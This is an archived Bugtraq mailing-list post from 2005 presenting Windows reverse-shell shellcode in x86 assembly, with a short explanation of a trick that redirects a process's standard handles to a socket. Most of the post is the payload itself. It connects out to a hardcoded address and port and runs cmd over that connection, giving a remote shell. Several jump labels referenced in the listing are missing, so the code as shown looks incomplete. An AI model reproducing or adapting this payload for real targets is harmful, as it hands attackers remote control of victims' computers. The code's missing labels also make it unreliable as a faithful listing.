Bugtraq mailing list archives

249bytes reverse shellcode with "nooil tricks methods"

From: msuiche () gmail com
Date: 14 Aug 2005 22:42:14 -0000

We use the PEB for the Output/Input/Error Handles.

typedef struct PEB
BOOLEAN InheritedAddressSpace ;
BOOLEAN ReadImageFileExecOptions ;
BOOLEAN BeingDebugged ;
HANDLE Mutant ;
PVOID ImageBaseAddress ;
PPEB LDR DATA LoaderData ;
ULONG MaximumLength ;
ULONG Length ;
ULONG Flags ;
ULONG DebugFlags ;
PVOID ConsoleHandle ;
ULONG ConsoleFlags ;
HANDLE StdInputHandle ; +18h
HANDLE StdOutputHandle ; +1Ch
HANDLE StdErrorHandle ; +20h

So with the nooil tricks we have now :
mov eax,dword ptr fs :[18h]
mov eax,dword ptr ds :[eax+30h]
mov eax,dword ptr ds :[eax+10h]
mov ecx, hClientSocket
mov dword ptr ds :[eax+18h],ecx ; SetStdHandle(STD INPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+1Ch],ecx ; SetStdHandle(STD OUTPUT HANDLE,hClientSocket) ;
mov dword ptr ds :[eax+20h],ecx ; SetStdHandle(STD ERROR HANDLE,hClientSocket) ;

249 bytes Reverse Generic Shellcode without loader(no null byte) : 

comment *
---- New generation shellcode using my "nooil tricks" methods ---
----    (c) 2005 - Matthieu Suiche / msuiche () gmail com        ---
249 bytes Reverse Generic Shellcode without loader(no null byte)
hehe hi metasploit's guys ;)
.model flat, stdcall

assume fs:nothing

LoadLibraryA    equ 0D6C3D898h
WSAStartupA     equ 0C7B3B4CBh
WSASocketA      equ 0B8ACB6C6h
connect                 equ 06EE2D2C8h
system                  equ 0E873E6D8h
ExitProcessA    equ 0D7D8EA95h
; ------------------------------
sin_addr                equ 0B01A8C0h ;
sin_port                equ 3713h       ; 4919
; ------------------------------
str_cmd                 equ 0FF646D63h

; ----------------------------------------------------
_nooil_ segment public ; writable section
; ----- CODE ----- 
        jmp short _eip
        pop             edi
        jmp short EntryPoint
        call    GetEip
        test    eax, eax
        jnz             MyGetProcAddr
        ; eax = 0
        mov     eax, dword ptr fs:[eax+30h]
        mov     eax, dword ptr ds:[eax+0ch]
        mov     esi, dword ptr ds:[eax+1ch]
        mov     eax, dword ptr ds:[eax+08h]
        mov             edx, eax
; - PE
        add             edx, dword ptr ds:[edx+3ch]
; - Export Table
        mov             edx, dword ptr ds:[edx+78h]
        add             edx, eax
        mov     ebx, dword ptr ds:[edx+20h]
        add             ebx, eax
        xor             ecx, ecx
        mov             ebp, eax
        inc             ecx
        mov     edi, dword ptr ds:[ebx+ecx*4]
        add             edi, eax

        mov             esi, dword ptr [edi]            
        add             esi, dword ptr [edi+4]
        cmp             esi, [esp+36]
        jz              AddrFound
        jmp             short FindAddr

        mov     ebx, dword ptr ds:[edx+24h]
        add     ebx, ebp
        mov     cx,word ptr ds:[ebx+ecx*2]
        mov     ebx, dword ptr ds:[edx+1Ch]
        add     ebx, ebp
        add     ebp, dword ptr ds:[ebx+ecx*4]

        mov             dword ptr [esp+28], ebp

        xor             eax, eax
        xor             ecx, ecx
        push    LoadLibraryA
        call    edi                                                     ; MyGetProcAddr(LoadLibraryA);
        mov             ebp, eax
        push    cx
        push    word ptr '23'
        push    '_2sw'
        push    esp
        call    eax             ; LoadLibraryA("ws2_32");
        mov             ebx, eax
        push    WSAStartupA
        call    edi             ; MyGetProcAddr(WSAStartupA)
        mov             esi, esp
        add             si, -301h
        push    esi
        push    2
        call    eax             ; WSAStartup(2,&WSAstruct);
        mov             eax, ebx
        push    WSASocketA
        call    edi             ; MyGetProcAddr(WSASocketA);
        xor             esi, esi
        push    esi
        push    esi
        push    esi
        push    esi
        inc             esi
        push    esi
        inc             esi
        push    esi
        call    eax             ; WSASocket(2,1,0,0,0,0);
        xchg    ebx, eax ; ebx = sockfd , eax = ws2_32

        push    sin_addr
        push    word ptr sin_port
        push    si
        mov             esi, esp
        push    connect
        call    edi             ; MyGetProcAddr(connect)
        push    10h
        push    esi
        push    ebx
        call    eax             ; connect(sockfd, &struct, sizeof(struct));
        push    ax
        push    word ptr 'tr'
        push    'cvsm'
        push    esp
        call    ebp             ; LoadLibraryA("msvcrt");
        push    system
        call    edi             ; MyGetProcAddr(system);

        ; ----------------------------- nooil tricks ----------------------------------
        xor             ecx, ecx
        mov             ecx,dword ptr fs:[ecx+18h]
        mov             ecx,dword ptr ds:[ecx+30h]
        mov             ecx,dword ptr ds:[ecx+10h]
        mov             dword ptr ds:[ecx+18h],ebx ; SetStdHandle(STD_INPUT_HANDLE,hClient);
        mov     dword ptr ds:[ecx+1Ch],ebx ; SetStdHandle(STD_OUTPUT_HANDLE,hClient);
        mov     dword ptr ds:[ecx+20h],ebx ; SetStdHandle(STD_ERROR_HANDLE,hClient);
        ; -----------------------------------------------------------------------------

        push    str_cmd
        inc             byte ptr [esp+3]
        push    esp
        call    eax     ; system("cmd");
        ; Exit
        push    ExitProcessA
        call    edi             ; MyGetProcAddr(ExitProcessA)
        call    eax             ; ExitProcessA();
end scode
; ------ END CODE ------
_nooil_ ends
; ----------------------------------------------------

Current thread: